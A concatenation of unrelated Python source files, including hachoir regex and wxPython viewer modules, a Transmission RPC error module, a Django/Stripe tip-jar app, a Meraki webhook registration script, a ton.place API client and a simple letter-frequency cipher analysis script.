class RegexAnd(Regex):
def __init__(self, items):
self.content = list(items)
assert 2 <= len(self.content)
def _minmaxLength(self, lengths):
total = 0
for length in lengths:
if length is None:
return None
total += length
return total
def minLength(self):
"""
>>> regex=((RegexString('a') | RegexString('bcd')) + RegexString('z'))
>>> regex.minLength()
2
"""
return self._minmaxLength(regex.minLength() for regex in self.content)
def maxLength(self):
"""
>>> regex=RegexOr((RegexString('a'), RegexString('bcd')))
>>> RegexAnd((regex, RegexString('z'))).maxLength()
4
"""
return self._minmaxLength(regex.maxLength() for regex in self.content)
def _or_(self, other, reverse):
if other.__class__ == RegexString:
contentb = [other]
elif other.__class__ == RegexAnd:
contentb = other.content
else:
return None
contenta = self.content
if reverse:
contenta, contentb = contentb, contenta
# Find common prefix
# eg. (ab|ac) => a(b|c) and (abc|abd) => ab(c|d)
index = 0
last_index = min(len(contenta), len(contentb))
while index < last_index and contenta[index] == contentb[index]:
index += 1
if index:
regex = RegexAnd.join(
contenta[index:]) | RegexAnd.join(contentb[index:])
return RegexAnd.join(contenta[:index]) + regex
# Find common prefix: (abc|aef) => a(bc|ef)
common = contenta[0].findPrefix(contentb[0])
if common:
regexa = common[1] & RegexAnd.join(contenta[1:])
regexb = common[2] & RegexAnd.join(contentb[1:])
regex = (regexa | regexb)
if matchSingleValue(common[0]) or matchSingleValue(regex):
return common[0] + regex
return None
def _and(self, regex):
"""
>>> RegexDot() + RegexDot()
<RegexAnd '..'>
>>> RegexDot() + RegexString('a') + RegexString('b')
<RegexAnd '.ab'>
"""
if regex.__class__ == RegexAnd:
total = self
for item in regex.content:
total = total + item
return total
new_item = self.content[-1]._and(regex)
if new_item:
self.content[-1] = new_item
return self
return RegexAnd(self.content + [regex])
def _str(self, **kw):
return ''.join(item.__str__(**kw) for item in self.content)
@classmethod
def join(cls, regex):
"""
>>> RegexAnd.join( (RegexString('Big '), RegexString('fish')) )
<RegexString 'Big fish'>
"""
return _join(operator.__and__, regex)
def __iter__(self):
return iter(self.content)
def _eq(self, other):
if len(self.content) != len(other.content):
return False
return all(item[0] == item[1] for item in zip(self.content, other.content))
class RegexOr(Regex):
def __init__(self, items, optimize=True):
if optimize:
self.content = []
for item in items:
if item in self:
continue
self.content.append(item)
else:
self.content = tuple(items)
assert 2 <= len(self.content)
def __contains__(self, regex):
for item in self.content:
if item == regex:
return True
return False
def _or_(self, other, reverse):
"""
>>> (RegexString("abc") | RegexString("123")) | (RegexString("plop") | RegexString("456"))
<RegexOr '(abc|123|plop|456)'>
>>> RegexString("mouse") | createRange('a') | RegexString("2006") | createRange('z')
<RegexOr '(mouse|[az]|2006)'>
"""
if other.__class__ == RegexOr:
total = self
for item in other.content:
total = total | item
return total
for index, item in enumerate(self.content):
new_item = item.or_(other)
if new_item:
content = list(self.content)
content = content[:index] + [new_item] + content[index + 1:]
return RegexOr(content, optimize=False)
if not reverse:
content = list(self.content) + [other]
else:
content = [other] + list(self.content)
return RegexOr(content, optimize=False)
def _str(self, **kw):
content = '|'.join(item.__str__(**kw) for item in self.content)
if kw.get('python', False):
return "(?:%s)" % content
else:
return "(%s)" % content
def _minmaxLength(self, lengths, func):
value = None
for length in lengths:
if length is None:
return None
if value is None:
value = length
else:
value = func(value, length)
return value
def minLength(self):
lengths = (regex.minLength() for regex in self.content)
return self._minmaxLength(lengths, min)
def maxLength(self):
lengths = (regex.maxLength() for regex in self.content)
return self._minmaxLength(lengths, max)
@classmethod
def join(cls, regex):
"""
>>> RegexOr.join( (RegexString('a'), RegexString('b'), RegexString('c')) )
<RegexRange '[a-c]'>
"""
return _join(operator.__or__, regex)
def __iter__(self):
return iter(self.content)
def _eq(self, other):
if len(self.content) != len(other.content):
return False
return all(item[0] == item[1] for item in zip(self.content, other.content))
def optimizeRepeatOr(rmin, rmax, regex):
# Fix rmin/rmax
for item in regex:
cls = item.__class__
if cls == RegexEmpty:
# (a|b|){x,y} => (a|b){0,y}
rmin = 0
elif cls == RegexRepeat:
# (a{0,n}|b){x,y} => (a{1,n}|b){0,y}
if item.min == 0 and rmin == 1:
rmin = 0
# Create new (optimized) RegexOr expression
content = []
for item in regex:
cls = item.__class__
if cls == RegexEmpty:
# (a|){x,y} => a{0,y}
continue
if cls == RegexRepeat:
if item.min == 0:
if rmin in (0, 1):
if rmax is item.max is None:
# (a*|b){x,} => (a|b){x,}
item = item.regex
else:
# (a{0,p}|b){x,} => (a{1,p}|b){x,}
item = RegexRepeat(
item.regex, 1, item.max, optimize=False)
elif item.min == 1:
if rmax is item.max is None:
# (a+|b){x,} => (a|b){x,}
item = item.regex
else:
if rmax is item.max is None:
# (a{n,}|b){x,} => (a{n}|b){x,}
item = RegexRepeat(item.regex, item.min,
item.min, optimize=False)
content.append(item)
regex = RegexOr.join(content)
return (rmin, rmax, regex)
class RegexRepeat(Regex):
"""
>>> a=createString('a')
>>> RegexRepeat(a, 0, None)
<RegexRepeat 'a*'>
>>> RegexRepeat(a, 1, None)
<RegexRepeat 'a+'>
>>> RegexRepeat(a, 0, 1)
<RegexRepeat 'a?'>
>>> RegexRepeat(a, 0, 1)
<RegexRepeat 'a?'>
>>> RegexRepeat(a, 1, 3)
<RegexRepeat 'a{1,3}'>
"""
def __init__(self, regex, rmin, rmax, optimize=True):
# Optimisations
if optimize:
cls = regex.__class__
if cls == RegexRepeat:
# (a{n,p}){x,y) => a{n*x,p*y}
if not (rmin == 0 and rmax == 1):
rmin *= regex.min
if regex.max and rmax:
rmax *= regex.max
else:
rmax = None
regex = regex.regex
elif cls == RegexOr:
rmin, rmax, regex = optimizeRepeatOr(rmin, rmax, regex)
# Store attributes
self.regex = regex
self.min = rmin
self.max = rmax
# Post-conditions
assert 0 <= rmin
if self.max is not None:
if self.max < self.min:
raise ValueError(
"RegexRepeat: minimum (%s) is bigger than maximum (%s)!" % (self.min, self.max))
if (self.max == 0) \
or (self.min == self.max == 1):
raise ValueError(
"RegexRepeat: invalid values (min=%s, max=%s)!" % (self.min, self.max))
def minLength(self):
"""
>>> r=RegexRepeat(createString("abc") | createString("01"), 1, 3)
>>> r.minLength(), r.maxLength()
(2, 9)
>>> r=RegexRepeat(createString("abc") | createString("01"), 4, None)
>>> r.minLength(), r.maxLength()
(8, None)
"""
if self.min is not None:
return self.regex.minLength() * self.min
else:
return None
def maxLength(self):
if self.max is not None:
return self.regex.maxLength() * self.max
else:
return None
def _str(self, **kw):
text = str(self.regex)
if self.regex.__class__ == RegexAnd \
or (self.regex.__class__ == RegexString and 1 < len(self.regex.text)):
text = "(%s)" % text
if self.min == 0 and self.max == 1:
return "%s?" % text
if self.min == self.max:
return "%s{%u}" % (text, self.min)
if self.max is None:
if self.min == 0:
return "%s*" % text
elif self.min == 1:
return "%s+" % text
else:
return "%s{%u,}" % (text, self.min)
return "%s{%u,%u}" % (text, self.min, self.max)
def _eq(self, other):
if self.min != other.min:
return False
if self.max != other.max:
return False
return (self.regex == other.regex)
if __name__ == "__main__":
import doctest
doctest.testmod()
```
#### File: hachoir/wx/dialogs.py
```python
import wx
import os
def file_open_dialog():
dialog_style = wx.FD_OPEN | wx.FD_FILE_MUST_EXIST
dialog = wx.FileDialog(
None, message='Open',
defaultDir=os.getcwd(),
defaultFile='', style=dialog_style)
return dialog
def file_save_dialog(title):
dialog_style = wx.FD_SAVE
dialog = wx.FileDialog(
None, message=title,
defaultDir=os.getcwd(),
defaultFile='', style=dialog_style)
return dialog
```
#### File: wx/field_view/field_split_menu_imp.py
```python
from hachoir.field import RawBytes, RawBits
class field_split_menu_imp_t:
def on_field_split_menu_ready(self, dispatcher, view):
assert view is not None
self.view = view
def on_field_selected(self, dispatcher, field):
self.field = field
def on_split_bytes(self):
if self.split_field('Split Bytes...', self.field, RawBytes, lambda field: field._getSize() // 8):
self.dispatcher.trigger('field_was_split_bytes', self.field)
def on_split_bits(self):
if self.split_field('Split Bits...', self.field, RawBits, lambda field: field._getSize()):
self.dispatcher.trigger('field_was_split_bits', self.field)
def split_field(self, caption, field, split_type, size_func):
offset = self.view.ask_split(caption, 1, size_func(field) - 1)
# FIXME: code commented because of pep8 warning
# if offset is not None:
# new_fields = split_field(field, offset, field._getName(), split_type, size_func)
return offset
```
#### File: wx/field_view/field_view.py
```python
from wx import ListCtrl, EVT_WINDOW_CREATE, CallAfter
from wx.lib.mixins.listctrl import ListCtrlAutoWidthMixin
class field_view_t(ListCtrl, ListCtrlAutoWidthMixin):
def __init__(self):
self.cols = {}
ListCtrl.__init__(self)
self.Bind(EVT_WINDOW_CREATE, self.on_create)
def post_init(self):
ListCtrlAutoWidthMixin.__init__(self)
columns = ['address', 'name', 'type', 'size', 'data', 'description']
for name in columns:
self.append_column(name)
self.col_min_width = [len(s) for s in columns]
self.Layout()
self.dispatcher.trigger('field_view_ready', self)
def on_create(self, event):
self.Unbind(EVT_WINDOW_CREATE)
CallAfter(self.post_init)
def append_column(self, name):
index = self.GetColumnCount()
self.cols[name] = index
self.InsertColumn(col=index, heading=name)
def get_selected(self, name):
return self.GetItem(self.GetFocusedItem(), self.cols['name']).GetText()
def clear(self):
self.DeleteAllItems()
def register_callback(self, cbGetItemText):
self.OnGetItemText_imp = cbGetItemText
def OnGetItemText(self, item, col):
return self.OnGetItemText_imp(item, col)
def get_col_index(self, name):
return self.cols[name]
def get_col_count(self):
return len(self.cols)
def resize_column(self, col_index, width):
width = max(self.col_min_width[col_index], width) + 1
self.SetColumnWidth(col_index, self.GetCharWidth() * width)
```
#### File: wx/hex_view/file_cache.py
```python
from functools import lru_cache
class FileCache(object):
CHUNKSIZE = 4096
def __init__(self, file):
self.file = file
self.update_file_size()
def update_file_size(self):
pos = self.file.tell()
self.file.seek(0, 2)
self.filesize = self.file.tell()
self.file.seek(pos)
@lru_cache(maxsize=100)
def get_chunk(self, cstart):
pos = self.file.tell()
self.file.seek(cstart)
chunk = self.file.read(self.CHUNKSIZE)
self.file.seek(pos)
return chunk
def hint(self, s, e):
'''Hint that the range [s, e) may be needed soon'''
sc = s // self.CHUNKSIZE
ec = (e + self.CHUNKSIZE - 1) // self.CHUNKSIZE
for c in range(sc, ec):
self.get_chunk(c * self.CHUNKSIZE)
def get(self, s, e):
'''Obtain the file contents in the range [s, e)'''
soff = s % self.CHUNKSIZE
eoff = e % self.CHUNKSIZE
sc = s // self.CHUNKSIZE
ec = (e + self.CHUNKSIZE - 1) // self.CHUNKSIZE
out = []
for c in range(sc, ec):
out.append(self.get_chunk(c * self.CHUNKSIZE))
if eoff:
out[-1] = out[-1][:eoff]
if soff:
out[0] = out[0][soff:]
return b''.join(out)
def test():
from io import BytesIO
for blocksize in [8, 1024]:
instr = bytes(range(256))
sf = BytesIO(instr)
fc = FileCache(sf)
fc.CHUNKSIZE = blocksize
import random
random.seed(1)
for iter in range(256):
s = random.randrange(0, fc.filesize + 10)
e = random.randrange(s, fc.filesize + 10)
print("testing", s, e)
got = fc.get(s, e)
expected = instr[s:e]
assert got == expected, "Failed to get %d, %d: got %r, expected %r" % (s, e, got, expected)
if __name__ == '__main__':
test()
```
#### File: wx/hex_view/hex_view_setup.py
```python
from hachoir.wx.resource import get_child_control
def setup_hex_view(parent, dispatcher):
print("[+] Setup hex view")
hex_view = get_child_control(parent, 'hex_view')
dispatcher.add_sender(hex_view)
dispatcher.add(hex_view)
dispatcher.add_receiver(hex_view)
return hex_view
```
#### File: hachoir/wx/main.py
```python
from hachoir.wx.app import app_t
from hachoir.version import PACKAGE, VERSION, WEBSITE
from hachoir.core.cmd_line import getHachoirOptions, configureHachoir
from optparse import OptionParser
import sys
def parseOptions():
parser = OptionParser(usage="%prog [options] [filename]")
hachoir = getHachoirOptions(parser)
parser.add_option_group(hachoir)
values, arguments = parser.parse_args()
if len(arguments) == 1:
filename = arguments[0]
elif not arguments:
filename = None
else:
parser.print_help()
sys.exit(1)
return values, filename
def main():
print("%s version %s" % (PACKAGE, VERSION))
print(WEBSITE)
print()
values, filename = parseOptions()
configureHachoir(values)
app = app_t(filename)
app.MainLoop()
if __name__ == '__main__':
main()
```
#### File: wx/resource/resource.py
```python
import os
from wx.xrc import XmlResource, XRCID
def get_resource():
filename = os.path.join(os.getcwd(), os.path.dirname(__file__), 'hachoir_wx.xrc')
return XmlResource(filename)
def get_frame(name):
return get_resource().LoadFrame(None, name)
def get_child_control(parent, child):
# We do this instead of XRCCTRL to work around a bug in wxPython 3.0.3.
# FindWindowById, FindWindowByName and XRCCTRL all seem to return the
# first-created "child" instead of the proper one; only FindWindow behaves
# as expected.
return parent.FindWindow(XRCID(child))
def get_menu_bar(name):
return get_resource().LoadMenuBar(name)
def get_menu(name):
return get_resource().LoadMenu(name)
```
#### File: lib/transmissionrpc/error.py
```python
from six import string_types, integer_types
class TransmissionError(Exception):
"""
This exception is raised when there has occurred an error related to
communication with Transmission. It is a subclass of Exception.
"""
def __init__(self, message='', original=None):
Exception.__init__(self)
self.message = message
self.original = original
def __str__(self):
if self.original:
original_name = type(self.original).__name__
return '%s Original exception: %s, "%s"' % (self.message, original_name, str(self.original))
else:
return self.message
class HTTPHandlerError(Exception):
"""
This exception is raised when there has occurred an error related to
the HTTP handler. It is a subclass of Exception.
"""
def __init__(self, httpurl=None, httpcode=None, httpmsg=None, httpheaders=None, httpdata=None):
Exception.__init__(self)
self.url = ''
self.code = 600
self.message = ''
self.headers = {}
self.data = ''
if isinstance(httpurl, string_types):
self.url = httpurl
if isinstance(httpcode, integer_types):
self.code = httpcode
if isinstance(httpmsg, string_types):
self.message = httpmsg
if isinstance(httpheaders, dict):
self.headers = httpheaders
if isinstance(httpdata, string_types):
self.data = httpdata
def __repr__(self):
return '<HTTPHandlerError %d, %s>' % (self.code, self.message)
def __str__(self):
return 'HTTPHandlerError %d: %s' % (self.code, self.message)
def __unicode__(self):
return 'HTTPHandlerError %d: %s' % (self.code, self.message)
``` |
{
"source": "0x213F/tip-jar",
"score": 2
} |
#### File: config/views/checkout_view.py
```python
import stripe
from decimal import Decimal
from django.conf import settings
from django.contrib.auth import get_user_model
from config import utils as config_utils
from tip_jar.core.base_view import BaseView
User = get_user_model()
stripe.api_key = settings.STRIPE_API_KEY
class MusicianCheckoutView(BaseView):
def get(self, request, musician, **kwargs):
"""
By now the user has finalized their cart selection.
- musician_amount: initial amount pledge.
- transaction_covered: opt in to covering the transaction fees.
- total_amount: the final total bill.
- transaction_fee: how much goes to Stripe
- website_amount: how much goes to the Musician Tips Dividend.
- intent: mandatory setup for a Stripe transaction.
"""
user = User.objects.get(username=musician)
musician_amount = request.GET.get("amount")
transaction_covered = request.GET.get("transactionCovered", False) == "true"
(
total_amount,
musician_amount,
transaction_fee,
) = config_utils.get_checkout_total(
musician_amount,
transaction_covered,
)
intent = stripe.PaymentIntent.create(
amount=int(total_amount * Decimal("100")),
currency="usd",
metadata={"musician": musician},
)
return self.template_response(
request,
"pages/checkout.html",
{
"client_secret": intent["client_secret"],
"musician": user,
"total_amount": total_amount,
"musician_amount": musician_amount,
"transaction_fee": transaction_fee,
"transaction_covered": transaction_covered,
"stripe_public_key": settings.STRIPE_PUBLIC_KEY,
},
)
```
#### File: tip_jar/core/base_view.py
```python
from django.core.serializers import serialize
from django.http import (
HttpResponse,
HttpResponseBadRequest,
HttpResponseForbidden,
HttpResponseRedirect,
JsonResponse,
)
from django.template.response import TemplateResponse
from django.views import View
class BaseView(View):
"""
Inherits from Django View.
"""
def http_response_200(self, data=None):
"""
SUCCESS
"""
response = {
"system": {
"status": 200,
"message": "Ok",
},
}
if data:
response["data"] = data
if type(response) == dict:
return JsonResponse(response)
if type(response) == list:
return JsonResponse(serialize("json", response), safe=False)
return JsonResponse(serialize("json", [response])[1:-1], safe=False)
def http_response_400(self, message):
"""
BAD REQUEST
"""
return HttpResponseBadRequest(message)
def http_response_403(self, message):
"""
FORBIDDEN
"""
return HttpResponseForbidden(message)
def http_response_422(self, message):
"""
INVALID FORMAT
"""
return HttpResponse(status_code=422, message=message)
def template_response(self, request, template, context={}):
return TemplateResponse(request, template, context)
def redirect_response(self, redirect_path):
return HttpResponseRedirect(redirect_path)
```
#### File: tip_jar/payments/models.py
```python
import pgtrigger
import uuid
from django.db import models
@pgtrigger.register(
pgtrigger.Protect(
name="append_only",
operation=(pgtrigger.Update | pgtrigger.Delete),
)
)
class Payment(models.Model):
uuid = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, null=True, blank=True
)
amount = models.DecimalField(max_digits=6, decimal_places=2)
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return f"[{self.user}] ${self.amount}"
class AmountChoice(models.Model):
uuid = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, null=True, blank=True
)
amount = models.DecimalField(max_digits=4, decimal_places=0)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __str__(self):
return f"[{self.user}] ${self.amount}"
``` |
{
"source": "0x2142/meraki-discord-bot",
"score": 2
} |
#### File: 0x2142/meraki-discord-bot/meraki_register_webhook.py
```python
import json
import logging
import os
import secrets
import string
from time import sleep
import httpx
logging.basicConfig(level=os.environ.get("LOGLEVEL", "INFO"))
# Meraki settings
API_BASE_URL = "https://api.meraki.com/api/v1"
SHARED_SECRET = "".join(
(secrets.choice(string.ascii_letters + string.digits) for i in range(24))
)
class MerakiWebhook:
def __init__(self, MERAKI_API_KEY, WEBHOOK_NAME, WEBHOOK_URL, NETWORK):
"""
Pull in settings required for Meraki Dashboard API work,
then pull Org ID, Network ID, and create/update webhooks
"""
self.NETWORK = NETWORK
self.headers = {"X-Cisco-Meraki-API-Key": MERAKI_API_KEY}
self.webhook_config = {
"name": WEBHOOK_NAME,
"url": WEBHOOK_URL + "/post-msg-discord",
"sharedSecret": SHARED_SECRET,
}
logging.info("Beginning Meraki API webhook check/create/update")
self.webhookID = None
with httpx.Client() as self.http_client:
self.get_org_id()
self.get_network_id()
self.get_curent_webhooks()
if self.webhook_exists:
self.update_existing_webhook()
else:
self.create_new_webhook()
def get_org_id(self):
"""
Query Meraki API for which Organizations we have access to & return Org ID
"""
url = API_BASE_URL + "/organizations"
try:
response = self.http_client.get(url, headers=self.headers)
except httpx.ReadTimeout:
logging.exception("Error: Timed out trying to get Org ID")
orgID = json.loads(response.text)[0]["id"]
logging.info(f"Using Org ID: {orgID}")
self.orgID = orgID
def get_network_id(self):
"""
Use Organization ID to pull list of networks we have access to
"""
url = API_BASE_URL + f"/organizations/{self.orgID}/networks"
response = self.http_client.get(url, headers=self.headers)
data = json.loads(response.text)
logging.info(f"Got Network list, searching for network: {self.NETWORK}")
for network in data:
if network["name"] == self.NETWORK:
self.networkID = network["id"]
logging.info(f"Found Network: {self.NETWORK}, ID: {self.networkID}")
return
def get_curent_webhooks(self):
"""
Query list of all current configured webhooks
"""
url = API_BASE_URL + f"/networks/{self.networkID}/webhooks/httpServers"
response = self.http_client.get(url, headers=self.headers)
if response.status_code == 200:
self.current_webhooks = json.loads(response.text)
logging.info(f"Found {len(self.current_webhooks)} existing webhooks")
self.webhook_exists = False
if len(self.current_webhooks) >= 1:
logging.info("Checking if we own any of the existing webhooks....")
for config_item in self.current_webhooks:
if config_item["name"] == self.webhook_config["name"]:
self.webhookID = config_item["id"]
logging.info(f"Found existing webhook ID: {self.webhookID}")
self.webhook_exists = True
def create_new_webhook(self):
"""
Create new webhook config, if it doesn't already exist
"""
url = API_BASE_URL + f"/networks/{self.networkID}/webhooks/httpServers"
logging.info("Attempting to create new webhook config")
response = self.http_client.post(
url, json=self.webhook_config, headers=self.headers
)
if response.status_code == 201:
logging.info("Successfully created new Meraki webhook")
return
else:
logging.error("Failed to update webhook. Error:")
logging.error(f"Status code: {response.status_code}")
logging.error(f"Message: {response.text}")
def update_existing_webhook(self):
"""
Locate existing webhook ID created by this automation,
then update with any new parameters
"""
url = (
API_BASE_URL
+ f"/networks/{self.networkID}/webhooks/httpServers/{self.webhookID}"
)
logging.info(f"Updating existing webhook with ID: {self.webhookID}")
attempt = 1
while attempt <= 3:
logging.info("Sending PUT to update webhook...")
response = self.http_client.put(
url, json=self.webhook_config, headers=self.headers
)
if response.status_code == 200:
logging.info("Successfully updated webhook with new config")
return
else:
logging.error("Failed to update webhook. Error:")
logging.error(f"Status code: {response.status_code}")
logging.error(f"Message: {response.text}")
logging.error(f"Attempt {attempt} of 3... retrying...")
sleep(2)
attempt += 1
logging.error("Failed to update Meraki webhook.")
def update_webhook_url(self, url):
"""
Update self config for webhook URL
"""
logging.info(f"Got request to update Meraki target webhook URL to: {url}")
self.webhook_config["url"] = url + "/post-msg-discord"
if not self.webhookID:
self.get_curent_webhooks()
self.update_existing_webhook()
``` |
{
"source": "0x216/tonplace-api",
"score": 2
} |
#### File: tonplace-api/tonplace/api.py
```python
import io
import json
from aiohttp import ClientSession
from typing import Any, Union, Optional
from loguru import logger
import aiohttp
from .errors import TonPlaceError
from aiohttp_socks import ProxyConnector
from tonplace.attachments import Attachments
BASE_API = "https://api.ton.place/"
class API:
def __init__(self,
token: str,
proxy: Optional[str] = None):
self.base_path = BASE_API
self.token = token.strip('\n')
self.proxy = proxy
self.connector = None
self.headers = {
"Host": "api.ton.place",
"User-Agent": " Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en",
"Accept-Encoding": "gzip, deflate, br",
"Origin": "https://ton.place",
"Referer": "https://ton.place/",
"Content-Type": "application/json",
"Accept-Language": "en-US,en;q=0.5",
"Authorization": self.token,
}
if self.proxy:
self.connector = ProxyConnector.from_url(self.proxy)
self.session = ClientSession(headers=self.headers,
connector=self.connector)
async def request(
self,
method: str,
path: str,
data: Optional[Any] = None,
json_data: Optional[dict] = None,
):
response = await self.session.request(
method=method,
url = BASE_API + path,
data=data,
json=json_data,
)
if response.status >= 500:
logger.error(f"Error {response.status}")
raise TonPlaceError('Site is down')
try:
json_response = json.loads(await response.text())
except json.JSONDecodeError:
raise TonPlaceError(await response.text())
if isinstance(json_response, str):
return json_response
if json_response.get("code") == "fatal":
#if self.return_error:
return await response.text()
raise TonPlaceError(
f"Request error - {json_response.get('message')}"
)
return json_response
async def get_me(self):
"""
Info about yourself
"""
user = await self.request("POST", path="main/init")
return user
async def get_user(self, user_id: int):
"""
User info
:param user_id:
:return:
"""
user = await self.request("POST", path=f"profile/{user_id}")
return user
async def get_group(self, group_id: int):
"""
Group info
:param group_id:
:return:
"""
user = await self.request("POST", path=f"group/{group_id}")
return user
async def search(
self,
tab: str,
sort: str = "popular",
query: str = "",
city: int = 0,
start_from: int = 0,
):
"""
Search (return 30 elements)
:param tab: explore|peoples|groups
:param sort: popular|new|online
:param query: search query
:param start_from: offset
:param city: default zero
:return:
"""
result = await self.request(
"POST",
path=f"search",
json_data={
"query": query,
"startFrom": start_from,
"tab": tab,
"sort": sort,
"city": city,
},
)
return result
async def follow(self, user_id: int):
result = await self.request(
"POST",
path=f"follow/{user_id}/add",
)
return result
async def unfollow(self, user_id: int):
result = await self.request(
"POST",
path=f"follow/{user_id}/del",
)
return result
async def like(self, post_id: int):
result = await self.request(
"POST",
path=f"likes/{post_id}/post/add",
)
return result
async def unlike(self, post_id: int):
result = await self.request(
"POST",
path=f"likes/{post_id}/post/del",
)
return result
async def write_comment(
self,
post_id: int,
text: str = "",
attachments: Optional[list] = None,
reply: Optional[int] = 0,
group_id: Optional[int] = 0,
):
"""
:param post_id:
:param text:
:param attachments:
:param reply:
:param group_id:
:return:
"""
if attachments is None:
attachments = []
if isinstance(attachments, Attachments):
attachments = attachments.get_attachments()
result = await self.request(
"POST",
path=f"posts/new",
json_data={
"parentId": post_id,
"replyTo": reply,
"text": text,
"attachments": attachments,
"groupId": group_id,
},
)
return result
async def read_post(self, post_id: int):
"""
Increase views of post
:param post_id:
:return:
"""
result = await self.read_posts([post_id])
return result
async def read_posts(self, post_ids: list[int]):
"""
Increase views of posts
:param post_ids:
:return:
"""
result = await self.request(
"POST",
path=f"posts/read",
json_data={
"posts": post_ids,
},
)
return result
async def get_post(self, post_id: int):
# TODO: next from comments
result = await self.request(
"GET",
path=f"posts/{post_id}",
)
return result
async def get_feed(
self, section: str, start_from: int = 0, suggestions: Optional[bool] = None
):
"""
Get Feed
:param section: - following|suggestions|liked (follows, suggetions, liked)
:param start_from: - offset
:param suggestions:
:return:
"""
if suggestions is None and section != "suggestions":
suggestions = False
result = await self.request(
"POST",
path=f"feed",
json_data={
"section": section,
"startFrom": start_from,
"suggestions": suggestions,
},
)
return result
async def get_dialogs(self):
result = await self.request(
"GET",
path=f"im",
)
return result
async def get_notify(self):
result = await self.request(
"GET",
path=f"notify",
)
return result
async def get_owned_groups(self):
result = await self.request(
"GET",
path=f"groups",
)
return result
async def get_balance(self):
result = await self.request(
"GET",
path=f"balance",
)
return result
async def send_ton(self, address: str, amount: float):
result = await self.request(
"POST",
path=f"balance/withdraw",
json_data={
"address": address,
"amount": amount,
},
)
return result
async def create_post(
self,
owner_id: int,
text: str = "",
parent_id: int = 0,
timer: int = 0,
attachments: Optional[Union[list, Attachments]] = None,
):
"""
Create post
:param owner_id: id of page or group (group id must be negative 123 -> -123)
:param text:
:param parent_id:
:param timer:
:param attachments:
:return:
"""
if attachments is None:
attachments = []
if isinstance(attachments, Attachments):
attachments = attachments.get_attachments()
result = await self.request(
"POST",
path=f"posts/new",
json_data={
"ownerId": owner_id,
"text": text,
"parentId": parent_id,
"attachments": attachments,
"timer": timer,
},
)
return result
async def _upload(
self,
upload_type: str,
data: bytes,
content_type: str,
album_id: int = -3,
file_name: str = "blob",
):
"""
:param upload_type: photos|video
:param data:
:param content_type:
:param album_id:
:param file_name:
:return:
"""
headers = self.headers.copy()
form_data = aiohttp.FormData()
form_data.add_field(
"file", io.BytesIO(data), filename=file_name, content_type=content_type
)
form_data.add_field("album_id", str(album_id))
form_data = form_data()
headers.update(form_data.headers)
resp = await self.session.post(
f"https://upload.ton.place/{upload_type}/upload",
headers=headers,
data=form_data,
)
return json.loads(await resp.text())
async def upload_photo(
self, data: bytes, album_id: int = -3, file_name: str = "blob"
):
return await self._upload(
upload_type="photos",
data=data,
content_type="image/jpeg",
album_id=album_id,
file_name=file_name,
)
async def upload_video(
self, data: bytes, album_id: int = -3, file_name: str = "blob"
):
return await self._upload(
upload_type="video",
data=data,
content_type="video/mp4",
album_id=album_id,
file_name=file_name,
)
async def get_referrals(self):
result = await self.request(
"GET",
path=f"invite/friends",
)
return result
async def edit_profile(
self,
birth_day: int,
birth_month: int,
birth_year: int,
city_id: int,
country_id: int,
first_name: str,
last_name: str,
sex: int,
):
result = await self.request(
"POST",
path=f"profile/edit",
json_data={
"bDay": birth_day,
"bMonth": birth_month,
"bYear": birth_year,
"cityId": city_id,
"countryId": country_id,
"firstName": first_name,
"lastName": last_name,
"sex": sex,
},
)
return result
async def check_domain(self, domain: str):
"""
Is domain free
:return:
"""
result = await self.request(
"GET", path=f"domain/check", json_data={"domain": domain}
)
return result
async def change_domain(self, domain: str):
result = await self.request(
"GET", path=f"profile/domain", json_data={"domain": domain}
)
return result
async def get_follow(
self,
user_id: int,
followers_type: str = "inbox",
start_from: int = 0,
query: str = "",
):
"""
:param user_id:
:param query:
:param start_from:
:param followers_type: inbox|outbox (followers|following)
:return:
"""
result = await self.request(
"GET",
path=f"followers/{user_id}/more",
json_data={
"query": query,
"type": followers_type,
"startFrom": start_from,
},
)
return result
async def close(self):
await self.session.close()
``` |
{
"source": "0x2342/tools",
"score": 4
} |
#### File: tools/freqAnalysis/freqAnalysis.py
```python
import sys
from operator import itemgetter
from collections import OrderedDict
f = open(sys.argv[1], 'r'); # Pass input file as parameter
s = str(f.read()); # Read input from file
s = s.replace (" ","") # Strip whitespaces
ETAOINSHRDLU = ["e","t","a","o","i","n","s","h","r","d","l","u"] # Most common single letters in the english language in descending order
#bigrams = ["th"]
#trigrams = ["the"]
chars = {"A":0, "B":0, "C":0, "D":0, "E":0, "F":0, "G":0, "H":0, "I":0, "J":0, "K":0, "L":0, "M":0, "N":0, "O":0, "P":0, "Q":0, "R":0, "S":0, "T":0, "U":0, "V":0, "W":0, "X":0, "Y":0, "Z":0}
def simpleFA( data ):
for c in data:
if c in chars:
chars[c] += 1
#res = dict()
#for i in range(0,len(data)-1):
# c = data[i:i+1]
# if c in res:
# res[c] += 1
# else:
# res.update({c:1})
orderedChars=OrderedDict(sorted(chars.items(), key=lambda x:-x[1]))
return orderedChars
def bigrams( data ):
res = dict()
for i in range(0,len(data)-2):
bigr = data[i:i+2]
if bigr in res:
res[bigr] +=1
else:
res.update({bigr:1})
res=OrderedDict(sorted(res.items(), key=lambda x:-x[1]))
return res
def trigrams( data ):
res = dict()
for i in range(0,len(data)-3):
trigr = data[i:i+3]
if trigr in res:
res[trigr] += 1
else:
res.update({trigr:1})
res=OrderedDict(sorted(res.items(), key=lambda x:-x[1]))
return res
def substHeu( data ):
single = simpleFA(data)
bi = bigrams(data)
tri = trigrams(data)
print "Most common trigrams: " + tri.keys()[0] + "," + tri.keys()[1] + "," + tri.keys()[2]
print "Most common digrams: " + bi.keys()[0] + "," + bi.keys()[1] + "," + bi.keys()[2]
print "Most common characters: " + single.keys()[0] + "," + single.keys()[1] + "," + single.keys()[2]
match = ( str(tri.keys()[0][0]) + str(tri.keys()[0][1])) # Match most common bigram against first two letters of most common trigram
d = dict() # Dictionary to hold assumed character mappings. Every key and every value should be unique :-)
if match == str(bi.keys()[0]):
d.update({tri.keys()[0]:'the'})
d.update({tri.keys()[0][0]:'t'})
d.update({tri.keys()[0][1]:'h'})
d.update({tri.keys()[0][2]:'e'})
